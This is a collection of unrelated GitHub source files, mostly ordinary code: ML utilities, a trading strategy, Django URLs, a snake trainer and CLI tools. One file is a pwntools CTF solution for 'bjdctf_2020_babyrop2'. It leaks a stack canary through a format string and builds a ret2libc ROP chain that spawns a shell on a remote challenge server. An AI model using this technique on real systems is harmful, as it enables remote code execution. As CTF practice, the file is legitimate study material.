lambda g: K.cast(g, x.dtype),\n))\n\ndef_vjp_maker(K.reshape, lambda ans, x, shape: (\n lambda g: K.reshape(g, K.shape(x)),\n))\n\ndef_vjp_maker(K.flatten, lambda ans, x: (\n lambda g: K.reshape(g, K.shape(x)),\n))\n\ndef_vjp_maker(K.where, lambda ans, c, x, y: (\n lambda g: None, # no vjp for condition parameter\n lambda g: K.where(c, g, K.zeros_like(g)),\n lambda g: K.where(c, K.zeros_like(g), g),\n))\n","repo_name":"guocuimi/minitf","sub_path":"minitf/vjps/primitive_vjps.py","file_name":"primitive_vjps.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"20907767709","text":"import csv\nimport re\n\nbase_dir = \"/Users/sujaybhowmick/development/courses/mlnd/MLND-Capstone/twitter-sentiment-analysis\"\npreprocessed_tweets = []\n\ndef clean_tweet(tweet):\n #tweet = row[1]\n new_tweet = ''\n for word in tweet.split():\n # String preprocessing\n if re.match('^.*@.*', word):\n word = '<NAME/>'\n if re.match('^.*http[s]?://.*', word):\n word = '<LINK/>'\n word = word.replace('#', '<HASHTAG/> ')\n word = word.replace('"', ' \\\" ')\n word = word.replace('&', ' & ')\n word = word.replace('>', ' > ')\n word = word.replace('<', ' < ')\n new_tweet = ' '.join([new_tweet, word])\n tweet = new_tweet.strip().strip(\".\")\n return tweet\n\n\ndef clean_str(cleaned_tweet):\n \"\"\"\n Tokenizes common abbreviations and punctuation, removes unwanted characters.\n Returns the clean string.\n \"\"\"\n # string = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", cleaned_tweet)\n string = re.sub(r'(.)\\1+', r'\\1\\1', cleaned_tweet)\n string = re.sub(r\"\\'s\", \" \\'s\", string)\n string = re.sub(r\"\\'ve\", \" \\'ve\", string)\n string = re.sub(r\"n\\'t\", \" n\\'t\", string)\n string = re.sub(r\"\\'re\", \" \\'re\", string)\n string = re.sub(r\"\\'d\", \" \\'d\", string)\n string = re.sub(r\"\\'ll\", \" \\'ll\", string)\n string = re.sub(r\",\", \" , \", string)\n string = re.sub(r\"!\", \" ! \", string)\n string = re.sub(r\"\\(\", \" \\( \", string)\n string = re.sub(r\"\\)\", \" \\) \", string)\n string = re.sub(r\"\\?\", \" \\? \", string)\n string = re.sub(r\"\\s{2,}\", \" \", string)\n string = re.sub(r\"“”¨«»®´·º½¾¿¡§£₤‘’\", \"\", string)\n return string.strip().lower()\n\n\ndef preprocess_csv_file(file_in):\n with open(file_in, \"r\", encoding=\"latin-1\") as csv_file:\n reader = csv.reader(csv_file)\n next(reader)\n for row in reader:\n cleaned_tweet = clean_tweet(clean_str(row[1]))\n preprocessed_tweets.append([row[0], cleaned_tweet, row[2]])\n\n\nif __name__ == \"__main__\":\n twitter_date_file_in = \"/Users/sujaybhowmick/development/courses/mlnd/MLND-Capstone/twitter-sentiment-analysis/data_formatted/twitter_tweets.csv\"\n preprocess_csv_file(twitter_date_file_in)\n with open(base_dir + \"/preprocessed_tweets.csv\", mode=\"a\", encoding=\"latin-1\") as csv_file_w:\n writer = csv.writer(csv_file_w)\n writer.writerow([\"msg_id\", \"content\", \"label\"])\n for row_w in preprocessed_tweets:\n writer.writerow(row_w)\n print(\"Total Preprocessed Tweets:\", len(preprocessed_tweets))\n preprocessed_tweets.clear()\n","repo_name":"sujaybhowmick/twitter_sentiment_analysis","sub_path":"data_helpers/preprocess_tw_csv.py","file_name":"preprocess_tw_csv.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"43771602943","text":"\n\nfrom cffi import FFI\nimport random\nfrom sys import exit, platform\nimport cv2\nimport numpy as np\nimport utils\n\nmcclib = utils.ffi_module_import( 'build/mcclib/libmcclib' )\n\n\ndef find( image ):\n r\"\"\"Find: Patch Color Recognition and Pose Estimation\n Args:\n image: image path or image \n min_error:\n min_resolution: \n box: return box of colorchecker \n \"\"\"\n\n img = image\n ub_img = img.reshape(-1,1).astype('ubyte')\n box = np.zeros( (8), dtype=np.float32 )\n\n ffi = FFI() \n ffi_ub_img = ffi.cast(\"unsigned char *\", ub_img.ctypes.data)\n ffi_f_box = ffi.cast(\"float *\", box.ctypes.data)\n\n mcclib.wmccfind( \n ffi_ub_img, # image\n img.shape[1], # int h, int w, \n img.shape[0], \n ffi_f_box, # float *box,\n 2.0, # float f_min_error,\n 1, # unsigned int ui_num_checker,\n 1500 # unsigned int ui_min_resolution \n )\n\n # array to vector\n box = np.array([ \n [box[0], box[1]], \n [box[2], box[3]], \n [box[4], box[5]], \n [box[6], box[7]] \n ]).astype(int)\n\n return box\n\n\n","repo_name":"pedrodiamel/colorchecker-detection","sub_path":"colorchecker.py","file_name":"colorchecker.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"44"} +{"seq_id":"22227998191","text":"# --- Do not remove these libs ---\nfrom freqtrade.strategy.interface import IStrategy\nfrom typing import Dict, List\nfrom functools import reduce\nfrom pandas import DataFrame\n# --------------------------------\n\nimport datetime\nimport talib.abstract as ta\nimport freqtrade.vendor.qtpylib.indicators as qtpylib\nimport numpy # noqa\n\n\nclass Maro4hBbAdxMacd(IStrategy):\n\n max_open_trades = 1\n stake_amount = 1000\n # Minimal ROI designed for the strategy.\n # This attribute will be overridden if the config file contains \"minimal_roi\"\n\n minimal_roi = {\n \"0\": 100\n }\n # Optimal stoploss designed for the strategy\n # This attribute will be overridden if the config file contains \"stoploss\"\n stoploss = -100\n\n # Optimal timeframe for the strategy\n timeframe = '4h'\n\n # trailing stoploss\n trailing_stop = False\n trailing_stop_positive = 0.1\n trailing_stop_positive_offset = 0.2\n\n # run \"populate_indicators\" only for new candle\n process_only_new_candles = False\n\n # Experimental settings (configuration will overide these if set)\n use_sell_signal = True\n sell_profit_only = False\n ignore_roi_if_buy_signal = False\n\n # Optional order type mapping\n order_types = {\n 'buy': 'limit',\n 'sell': 'limit',\n 'stoploss': 'market',\n 'stoploss_on_exchange': False\n }\n\n def informative_pairs(self):\n return [(\"BTC/USD\", \"4h\"), (\"ETH/USD\", \"4h\")]\n\n def populate_indicators(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Adds several different TA indicators to the given DataFrame\n Performance Note: For the best performance be frugal on the number of indicators\n you are using. Let uncomment only the indicator you are using in your strategies\n or your hyperopt configuration, otherwise you will waste your memory and CPU usage.\n \"\"\"\n\n bollinger = qtpylib.bollinger_bands(qtpylib.typical_price(dataframe), window=20, stds=2)\n dataframe['bb_lowerband'] = bollinger['lower']\n dataframe['bb_upperband'] = bollinger['upper']\n\n dataframe['adx'] = ta.ADX(dataframe, timeperiod=14)\n dataframe['di_plus'] = ta.PLUS_DI(dataframe, timeperiod=14)\n dataframe['di_minus'] = ta.MINUS_DI(dataframe, timeperiod=14)\n\n # MACD\n macd = ta.MACD(dataframe)\n dataframe['macd'] = macd['macd']\n dataframe['macdsignal'] = macd['macdsignal']\n dataframe['macdhist'] = macd['macdhist']\n\n return dataframe\n\n def populate_buy_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the buy signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n\n dataframe.loc[\n (\n ((qtpylib.crossed_above(dataframe['close'],dataframe['bb_lowerband'])) &\n (dataframe['adx'] < 25)) |\n ((qtpylib.crossed_above(dataframe['macdhist'],0)) &\n (dataframe['adx'] >= 25))\n ),'buy'] = 1\n\n return dataframe\n\n def populate_sell_trend(self, dataframe: DataFrame, metadata: dict) -> DataFrame:\n \"\"\"\n Based on TA indicators, populates the sell signal for the given dataframe\n :param dataframe: DataFrame\n :return: DataFrame with buy column\n \"\"\"\n dataframe.loc[\n (\n ((qtpylib.crossed_below(dataframe['close'],dataframe['bb_upperband'])) &\n (dataframe['adx'] < 25))|\n ((qtpylib.crossed_below(dataframe['macdhist'], 0)) &\n (dataframe['adx'] >= 25))\n )\n ,'sell'] = 1\n\n return dataframe","repo_name":"Kamelchahbi/Freqtrade_strategies","sub_path":"Maro4h_bb_macd_adx.py","file_name":"Maro4h_bb_macd_adx.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"17420467938","text":"#!/usr/bin/env python\n\nimport webmapper_http_server as server\nimport mapper\nimport sys\n\nif 'tracing' in sys.argv[1:]:\n server.tracing = True\n\nmonitor = mapper.monitor()\n\ndef on_device(dev, action):\n if action == mapper.MDB_NEW:\n server.send_command(\"new_device\", dev)\n if action == mapper.MDB_REMOVE:\n server.send_command(\"del_device\", dev)\n\ndef on_signal(sig, action):\n if action == mapper.MDB_NEW:\n server.send_command(\"new_signal\", sig)\n if action == mapper.MDB_REMOVE:\n server.send_command(\"del_signal\", sig)\n\ndef on_link(link, action):\n if action == mapper.MDB_NEW:\n server.send_command(\"new_link\", link)\n if action == mapper.MDB_REMOVE:\n server.send_command(\"del_link\", link)\n\ndef on_connection(con, action):\n if action == mapper.MDB_NEW:\n server.send_command(\"new_connection\", con)\n if action == mapper.MDB_MODIFY:\n server.send_command(\"mod_connection\", con)\n if action == mapper.MDB_REMOVE:\n server.send_command(\"del_connection\", con)\n\ndef set_connection(con):\n if con.has_key('mode'):\n con['mode'] = {'bypass': mapper.MO_BYPASS,\n 'linear': mapper.MO_LINEAR,\n 'calibrate': mapper.MO_CALIBRATE,\n 'expression': mapper.MO_EXPRESSION}[con['mode']]\n monitor.modify(con)\n\nmonitor.db.add_device_callback(on_device)\nmonitor.db.add_signal_callback(on_signal)\nmonitor.db.add_link_callback(on_link)\nmonitor.db.add_mapping_callback(on_connection)\n\nserver.add_command_handler(\"all_devices\",\n lambda x: (\"all_devices\",\n list(monitor.db.all_devices())))\n\nserver.add_command_handler(\"all_signals\",\n lambda x: (\"all_signals\",\n list(monitor.db.all_inputs())\n + list(monitor.db.all_outputs())))\n\nserver.add_command_handler(\"all_links\",\n lambda x: (\"all_links\",\n list(monitor.db.all_links())))\n\nserver.add_command_handler(\"all_connections\",\n lambda x: (\"all_connections\",\n list(monitor.db.all_mappings())))\n\nserver.add_command_handler(\"set_connection\", set_connection)\n\nserver.add_command_handler(\"link\",\n lambda x: monitor.link(*map(str,x)))\n\nserver.add_command_handler(\"unlink\",\n lambda x: monitor.unlink(*map(str,x)))\n\nserver.add_command_handler(\"connect\",\n lambda x: monitor.connect(*map(str,x)))\n\nserver.add_command_handler(\"disconnect\",\n lambda x: monitor.disconnect(*map(str,x)))\n\nserver.serve(port=8000, poll=lambda: monitor.poll(100))\n","repo_name":"vijayrudraraju/vizmapper","sub_path":"webmapper.py","file_name":"webmapper.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9986884276","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n c=0\n dum=ListNode(0)\n cur=dum\n while l1 or l2:\n carry=c\n if l1 and l2:\n carry+=(l1.val+l2.val)\n l1=l1.next\n l2=l2.next\n elif l1:\n carry+=l1.val\n l1=l1.next\n elif l2:\n carry+=l2.val\n l2=l2.next\n c=carry//10\n cur.next=ListNode(carry%10)\n cur=cur.next\n if c:\n cur.next=ListNode(1)\n return dum.next\n\n \n ","repo_name":"mulukenhailu/competitive-programming","sub_path":"0002-add-two-numbers/0002-add-two-numbers.py","file_name":"0002-add-two-numbers.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37325701289","text":"\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import permissions\nfrom rest_framework.routers import DefaultRouter\nfrom drf_yasg import openapi\nfrom drf_yasg.views import get_schema_view\n\nfrom main.views import *\n\nrouter = DefaultRouter()\nrouter.register('posts', PostViewSet)\nrouter.register('comments', CommentViewSet)\nrouter.register('likes', LikesViewSet)\nrouter.register('rating', RatingViewSet)\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title='SocialNetwork Api',\n default_version='v1',\n description=\"Test description\",\n terms_of_service=\"https://www.google.com/policies/terms/\",\n contact=openapi.Contact(email=\"contact@snippets.local\"),\n license=openapi.License(name=\"BSD License\"),\n ),\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path('', schema_view.with_ui()),\n path('admin/', admin.site.urls),\n path('api/v1/account/', include('account.urls')),\n path('api/v1/', include(router.urls)),\n path('api/v1/news/', ParsingView.as_view()),\n]\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","repo_name":"Jannet717/SocialNetwork","sub_path":"network_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33075904878","text":"from src.snake import Snake\nfrom src.evolution import ES\n\n\ndef train(args, env):\n nn_shape = [args.fov, args.hidden_layers, args.layer_size, 2] # 2 is the action space\n # the function that will be optimized\n F = lambda gen: Snake(nn_shape, genotype=gen).get_score(env, args.eval_games)\n # randomly initialized genotype theta\n theta = Snake(nn_shape).get_genotype()\n # instance of evolution strategies\n es = ES(args.lr, args.std, args.population_size, F, theta)\n # optimize theta\n for step in range(args.es_steps):\n score = es.step()\n print(\"Step: \", step+1, \"/\", args.es_steps, \"Fitness:\", \"{:.2f}\".format(score * 100))\n # save theta\n Snake(nn_shape, genotype=es.theta).save_genotype(args.save_file)\n","repo_name":"JaroslavUrbann/FIT_CTU","sub_path":"BI-ZUM/snake/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36041253273","text":"import json\r\nimport os\r\nimport logging\r\n\r\n\r\nclass SettingsIface(object):\r\n def __init__(self, d=None):\r\n # SETTINGS DEFAULTS\r\n self.move_tasks_file_path = 'move_tasks.json'\r\n self.log_level = 2\r\n # DEFAULTS END\r\n if d:\r\n for a, b in d.items():\r\n if isinstance(b, (list, tuple)):\r\n setattr(self, a, [SettingsIface(x) if isinstance(x, dict) else x for x in b])\r\n else:\r\n setattr(self, a, SettingsIface(b) if isinstance(b, dict) else b)\r\n\r\n def json(self):\r\n return json.dumps(self.__dict__)\r\n\r\n\r\nclass Settings:\r\n SETTINGS_FILE_PATH = 'settings.json'\r\n\r\n def __init__(self, check_settings_file=True):\r\n if check_settings_file:\r\n self.write_default_settings()\r\n\r\n def settings_file_exists(self):\r\n return os.path.exists(self.SETTINGS_FILE_PATH)\r\n\r\n def write_default_settings(self, force_overwrite=False):\r\n \"\"\"Writes default settings to file as JSON\"\"\"\r\n if self.settings_file_exists() and not force_overwrite:\r\n logging.out(\"Settings file found / force_overwrite not enabled, skipping step.\", 4)\r\n return\r\n logging.out(\"Settings file not found / force_overwrite enabled, creating default as {0}\"\r\n .format(self.SETTINGS_FILE_PATH), 1, True)\r\n settings_json = json.dumps(SettingsIface().__dict__)\r\n file = open(self.SETTINGS_FILE_PATH, 'w')\r\n file.write(settings_json)\r\n file.close()\r\n\r\n def get_settings(self) -> SettingsIface:\r\n \"\"\"Returns user settings from file cast into a SettingsIface object\"\"\"\r\n try:\r\n settings_json = open(self.SETTINGS_FILE_PATH, 'r').read()\r\n return SettingsIface(json.loads(settings_json))\r\n except FileNotFoundError:\r\n logging.out('Could not get settings. Does the file exist?', 0, True)\r\n","repo_name":"ioawnen/fileMover2","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28039937049","text":"from __future__ import print_function\nimport os\nimport random\nimport string\nimport sys\n\nfrom yoyo.compat import configparser\nfrom yoyo.config import CONFIG_EDITOR_KEY\n\ntry:\n import termios\n\n def getch():\n \"\"\"\n Read a single character without echoing to the console and without\n having to wait for a newline.\n \"\"\"\n fd = sys.stdin.fileno()\n saved_attributes = termios.tcgetattr(fd)\n try:\n attributes = termios.tcgetattr(fd) # get a fresh copy!\n attributes[3] = attributes[3] & ~(termios.ICANON | termios.ECHO)\n attributes[6][termios.VMIN] = 1\n attributes[6][termios.VTIME] = 0\n termios.tcsetattr(fd, termios.TCSANOW, attributes)\n\n a = sys.stdin.read(1)\n finally:\n # be sure to reset the attributes no matter what!\n termios.tcsetattr(fd, termios.TCSANOW, saved_attributes)\n return a\n\nexcept ImportError:\n # some non Windows environments don't have termios (google cloud)\n # running yoyo through the python sdk should not require `getch`\n try:\n from msvcrt import getch\n except:\n pass\n\n\ndef prompt(prompt, options):\n \"\"\"\n Display the given prompt and list of options and return the user selection.\n \"\"\"\n\n while True:\n sys.stdout.write(\"%s [%s]: \" % (prompt, options))\n sys.stdout.flush()\n ch = getch()\n if ch == '\\n':\n ch = ([o.lower() for o in options if 'A' <= o <= 'Z'] +\n list(options.lower()))[0]\n print(ch)\n if ch.lower() not in options.lower():\n print(\"Invalid response, please try again!\")\n else:\n break\n\n return ch.lower()\n\n\ndef confirm(s, default=None):\n options = 'yn'\n if default:\n default = default.lower()\n if default == 'y':\n options = 'Yn'\n elif default == 'n':\n options = 'yN'\n return prompt(s, options) == 'y'\n\n\ndef plural(quantity, one, plural):\n \"\"\"\n >>> plural(1, '%d dead frog', '%d dead frogs')\n '1 dead frog'\n >>> plural(2, '%d dead frog', '%d dead frogs')\n '2 dead frogs'\n \"\"\"\n if quantity == 1:\n return one.replace('%d', '%d' % quantity)\n return plural.replace('%d', '%d' % quantity)\n\n\ndef get_editor(config):\n \"\"\"\n Return the user's preferred visual editor\n \"\"\"\n try:\n return config.get('DEFAULT', CONFIG_EDITOR_KEY)\n except configparser.NoOptionError:\n pass\n for key in ['VISUAL', 'EDITOR']:\n editor = os.environ.get(key, None)\n if editor:\n return editor\n return 'vi'\n\n\ndef get_random_string(length, chars=(string.ascii_letters + string.digits)):\n \"\"\"\n Return a random string of ``length`` characters\n \"\"\"\n rng = random.SystemRandom()\n return ''.join(rng.choice(chars) for i in range(length))\n","repo_name":"emurphy/yoyo","sub_path":"yoyo/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1108246063","text":"from kontrachent import Kontrachent\nimport json\nimport os\nif __name__ == \"__main__\":\n print(\"Kontrachenci\")\n while True:\n print(\"Wybierz co chesz zrobić:\\n[0] Wyjście\\n[1]Dodaj kontrachenta\\n[2]Wyszukaj kontrachenta\\n[3]Usuń kontrachenta\\n[4]Pokaż kontrachentów\")\n try:\n opcja = int(input(\"Podaj numerek: \"))\n except:\n print(\"Nieprawidłowy numerek!\")\n continue\n if(opcja==0):\n break\n elif opcja==1:\n nazwa=input(\"Podaj nazwę kontrachenta: \")\n poczta=input(\"Podaj kod pocztowy kontrachenta: \")\n miasto=input(\"Podaj z jakiego miasta jest kontrachent: \")\n ulica=input(\"Podaj na jakiej ulicy znajduje się siedziba: \")\n osoba=input(\"Podaj osobę kontaktową: \")\n mail=input(\"Podaj maila do tej osoby: \")\n telefon=input(\"Podaj telefon do tej osoby: \")\n if os.path.isfile(\"./baza.json\"):\n file = open(\"baza.json\", \"r\")\n read = file.read()\n file.close()\n if read == \"\":\n file = open(\"baza.json\", \"rb+\")\n st = \"[\" + json.dumps(Kontrachent(nazwa,poczta,miasto,ulica,osoba,mail,telefon).__dict__) + \"]\"\n file.write(st.encode())\n file.close()\n if read == \"[]\":\n file = open(\"baza.json\", \"rb+\")\n file.seek(-1,2)\n st = json.dumps(Kontrachent(nazwa,poczta,miasto,ulica,osoba,mail,telefon).__dict__) + \"]\"\n file.write(st.encode())\n file.close()\n else:\n file = open(\"baza.json\", \"rb+\")\n file.seek(-1,2)\n st = \",\"+json.dumps(Kontrachent(nazwa,poczta,miasto,ulica,osoba,mail,telefon).__dict__) + \"]\"\n file.write(st.encode())\n file.close()\n else:\n file = open(\"baza.json\", \"w+\")\n file.write(\"[\")\n file.write(json.dumps(Kontrachent(nazwa,poczta,miasto,ulica,osoba,mail,telefon).__dict__))\n file.write(\"]\")\n file.close()\n elif opcja==2:\n try:\n file = open(\"baza.json\", \"r+\")\n arr = json.loads(file.read())\n file.close()\n except:\n arr=[]\n kontrahenci =[]\n for kontrahent in arr:\n kontrahenci.append(Kontrachent(kontrahent[\"nazwa\"],kontrahent[\"poczta\"],kontrahent[\"miasto\"],kontrahent[\"ulica\"],kontrahent[\"imie\"],kontrahent[\"mail\"],kontrahent[\"telefon\"]))\n print(\"[0] Po nazwie\\n[1] Po mieście\\n[2] Po osobie\\n[3] Po mailu\")\n try:\n num = int(input(\"Po czym wyszukać? \"))\n except:\n num=5\n if num==0:\n nazwa= input(\"Podaj nazwe kontrachenta aby wyszukać: \")\n for kontrahent in kontrahenci:\n if nazwa.lower() in kontrahent.nazwa.lower():\n kontrahent.wyswietl()\n elif num==1:\n nazwa= input(\"Podaj miasto kontrachenta aby wyszukać: \")\n for kontrahent in kontrahenci:\n if nazwa.lower() in kontrahent.miasto.lower():\n kontrahent.wyswietl()\n elif num==2:\n nazwa= input(\"Podaj osobę aby wyszukać: \")\n for kontrahent in kontrahenci:\n if nazwa.lower() in kontrahent.imie.lower():\n kontrahent.wyswietl()\n elif num==3:\n nazwa= input(\"Podaj mail kontrachenta aby wyszukać: \")\n for kontrahent in kontrahenci:\n if nazwa.lower() in kontrahent.mail.lower():\n kontrahent.wyswietl()\n elif opcja==3: #usuwanie\n try:\n file = open(\"baza.json\", \"r+\")\n arr = json.loads(file.read())\n file.close()\n except:\n arr=[]\n kontrahenci =[]\n for kontrahent in arr:\n kontrahenci.append(Kontrachent(kontrahent[\"nazwa\"],kontrahent[\"poczta\"],kontrahent[\"miasto\"],kontrahent[\"ulica\"],kontrahent[\"imie\"],kontrahent[\"mail\"],kontrahent[\"telefon\"]))\n\n usun = input(\"Podaj nazwę kontrachenta do usunięcia: \")\n for i in range(len(kontrahenci)):\n if kontrahenci[i].nazwa.lower()==usun.lower():\n del kontrahenci[i]\n print(\"Usunięto\")\n break\n file = open(\"baza.json\", \"w+\")\n file.write(\"[\")\n for i in range(len(kontrahenci)):\n if i ==0:\n file.write(json.dumps(kontrahenci[i].__dict__))\n else:\n file.write(\",\" + json.dumps(kontrahenci[i].__dict__))\n file.write(\"]\")\n file.close()\n\n elif opcja==4:\n try:\n file = open(\"baza.json\", \"r\")\n arr = json.loads(file.read())\n file.close()\n except:\n arr=[]\n kontrahenci =[]\n for kontrahent in arr:\n kontrahenci.append(Kontrachent(kontrahent[\"nazwa\"],kontrahent[\"poczta\"],kontrahent[\"miasto\"],kontrahent[\"ulica\"],kontrahent[\"imie\"],kontrahent[\"mail\"],kontrahent[\"telefon\"]))\n\n for kontrahent in kontrahenci:\n kontrahent.wyswietl() \n \n print(\"\\n\")","repo_name":"Faktura179/Faktura179.github.io","sub_path":"Informatyka/Python/Projekt_kontrachenci/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18716316345","text":"from pwn import *\nfrom LibcSearcher import *\n\nio = remote(\"node4.buuoj.cn\", 25599)\n\npayload = \"%7$p\"\nio.recvuntil(\"I'll give u some gift to help u!\\n\")\nio.sendline(payload)\n\ncanary = int(io.recvuntil(\"\\n\"), 16)\nprint(hex(canary))\n\npop_rdi = 0x400993\nputs_got = 0x601018\nputs_plt = 0x400610\nvuln = 0x0400887\npayload = \"a\"*24 + p64(canary) + p64(0xdeadbeaf)\npayload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)\nio.recvuntil(\"story!\\n\")\nio.sendline(payload)\n\naddr = u64(io.recvuntil(\"\\n\")[:-1].ljust(8, \"\\x00\"))\nprint(hex(addr))\n\nlibc = LibcSearcher(\"puts\", addr)\nbase = addr - libc.dump(\"puts\")\nsystem = base + libc.dump(\"system\")\nbinsh = base + libc.dump(\"str_bin_sh\")\n\npayload = \"a\"*24 + p64(canary) + p64(0xdeadbeaf)\npayload += p64(pop_rdi) + p64(binsh) + p64(system) + p64(vuln)\nio.recvuntil(\"story!\\n\")\nio.sendline(payload)\n\nio.interactive()","repo_name":"yqw1212/yqw1212.github.io","sub_path":"exercises/2021-08-01-bjdctf_2020_babyrop2/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8965305753","text":"# High-Low Game\n# Date Created: 5/24/20\n# Last Modified: 5/24/20\n\nimport random\n\n\ndef game_num():\n \"\"\"\n return a random number for gameplay\n :return: int between 1-100\n \"\"\"\n return random.randint(1, 100)\n\n\ndef main():\n guess = 0\n ct = 0\n\n print(\"Welcome to the High Low Game!!!\")\n print(\"Computer is guessing...\")\n goal = game_num()\n\n while guess != goal:\n guess = int(input(\"Enter a integer between 1-100: \"))\n\n if guess < 0:\n print(\"No negative numbers\")\n elif guess > 100:\n print(\"No numbers above 100\")\n elif guess > goal:\n print(\"Too high!\")\n ct += 1\n elif guess < goal:\n print(\"Too low!\")\n ct += 1\n\n print(\"\\nYou guessed it!\")\n print(\"Number of Guesses = \", ct)\n\n\nmain()\n","repo_name":"NarishSingh/Python-3-Projects","sub_path":"hilowgame/hiLow.py","file_name":"hiLow.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"31707275918","text":"import threading\n\nfrom util.Utils import *\nfrom view.Notepad import Notepad\nfrom view.new_circuit.CircuitStd import CircuitStd, CircuitStd_\nfrom view.old_circuit.Circuit import Circuit\n\n[wxID_EDITORFRAME, wxID_EDITORFRAMESTATUSBAR, wxID_EDITORFRAMETABS,\n wxID_EDITORFRAMETABSSPLITTER, wxID_EDITORFRAMETOOLBAR,\n] = [wx.NewId() for _init_ctrls in range(5)]\n\n(wxID_EDITOROPEN, wxID_EDITORSAVE, wxID_EDITORSAVEAS, wxID_EDITORCLOSEPAGE,\n wxID_EDITORREFRESH, wxID_EDITORDESIGNER, wxID_EDITORDEBUG, wxID_EDITORHELP,\n wxID_DEFAULTVIEWS, wxID_EDITORSWITCHTO, wxID_EDITORDIFF, wxID_EDITORPATCH,\n wxID_EDITORTOGGLEVIEW, wxID_EDITORSWITCHEXPLORER, wxID_EDITORSWITCHSHELL,\n wxID_EDITORSWITCHPALETTE, wxID_EDITORSWITCHINSPECTOR,\n wxID_EDITORTOGGLERO, wxID_EDITORHELPFIND, wxID_EDITORRELOAD,\n wxID_EDITORHELPABOUT, wxID_EDITORHELPGUIDE, wxID_EDITORHELPTIPS,\n wxID_EDITORHELPOPENEX,\n wxID_EDITORPREVPAGE, wxID_EDITORNEXTPAGE,\n wxID_EDITORBROWSEFWD, wxID_EDITORBROWSEBACK,\n wxID_EDITOREXITBOA, wxID_EDITOROPENRECENT,\n wxID_EDITORHIDEPALETTE, wxID_EDITORWINDIMS, wxID_EDITORWINDIMSLOAD,\n wxID_EDITORWINDIMSSAVE, wxID_EDITORWINDIMSRESDEFS,\n wxID_EDITORSWITCHPREFS,\n) = [wx.NewId() for x in range(36)]\n\nsuSocketFileOpenServer = True\n\nkeyDefs = {\n#--Source View------------------------------------------------------------------\n 'Refresh' : (wx.ACCEL_CTRL, ord('R'), 'Ctrl-R'),\n 'Find' : (wx.ACCEL_CTRL, ord('F'), 'Ctrl-F'),\n 'FindAgain' : (wx.ACCEL_NORMAL, wx.WXK_F3, 'F3'),\n 'FindAgainPrev' : (wx.ACCEL_SHIFT, wx.WXK_F3, 'Shift-F3'),\n 'ToggleBrk' : (wx.ACCEL_NORMAL, wx.WXK_F5, 'F5'),\n 'Indent' : (wx.ACCEL_CTRL, ord('I'), 'Ctrl-I'),\n 'Dedent' : (wx.ACCEL_CTRL, ord('U'), 'Ctrl-U'),\n 'Comment' : (wx.ACCEL_ALT, ord('3'), 'Alt-3'),\n 'Uncomment' : (wx.ACCEL_ALT, ord('4'), 'Alt-4'),\n 'DashLine' : (wx.ACCEL_CTRL, ord('B'), 'Ctrl-B'),\n 'MarkPlace' : (wx.ACCEL_CTRL, ord('M'), 'Ctrl-M'),\n 'CodeComplete': (wx.ACCEL_CTRL, wx.WXK_SPACE, 'Ctrl-Space'),\n 'CallTips' : (wx.ACCEL_SHIFT|wx.ACCEL_CTRL, wx.WXK_SPACE, 'Ctrl-Shift-Space'),\n 'CodeXform' : (wx.ACCEL_ALT, ord('C'), 'Alt-C'),\n 'BrowseTo' : (wx.ACCEL_CTRL, wx.WXK_RETURN, 'Ctrl-Return'),\n 'BrowseFwd' : (wx.ACCEL_SHIFT|wx.ACCEL_CTRL, ord('K'), 'Ctrl-K'),\n 'BrowseBack' : (wx.ACCEL_SHIFT|wx.ACCEL_CTRL, ord('J'), 'Ctrl-J'),\n#-Modules-----------------------------------------------------------------------\n 'RunApp' : (wx.ACCEL_NORMAL, wx.WXK_F9, 'F9'),\n 'RunMod' : (wx.ACCEL_NORMAL, wx.WXK_F10, 